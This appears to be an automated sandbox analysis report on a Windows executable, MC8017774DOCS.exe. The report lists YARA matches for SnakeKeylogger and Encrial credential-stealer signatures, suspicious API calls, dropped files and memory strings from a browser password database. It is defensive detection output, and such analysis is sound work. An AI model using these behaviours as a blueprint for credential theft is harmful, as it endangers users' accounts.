Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Creates files inside the system directory

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Windows\resources\0809

Detected potential crypto function

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00404C7B	0_2_00404C7B
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_6E9B1B63	0_2_6E9B1B63
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E43AAC	4_2_03E43AAC
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E4B978	4_2_03E4B978
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E44BC8	4_2_03E44BC8
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E41B4C	4_2_03E41B4C
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E469D1	4_2_03E469D1

Sample file is different than original file name gathered from version info

Source: MC8017774DOCS.exe, 00000004.00000003.2639623192.0000000035F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3476036769.0000000033A77000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe

Source: MC8017774DOCS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, -A-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/5@5/5

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Users\user\AppData\Local\Temp\nsj84F3.tmp

Source: MC8017774DOCS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003416B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003412B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003415E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003411B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000034139000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MC8017774DOCS.exe	ReversingLabs: Detection: 42%
Source: MC8017774DOCS.exe	Virustotal: Detection: 48%

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File read: C:\Users\user\Desktop\MC8017774DOCS.exe

Source: unknown	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
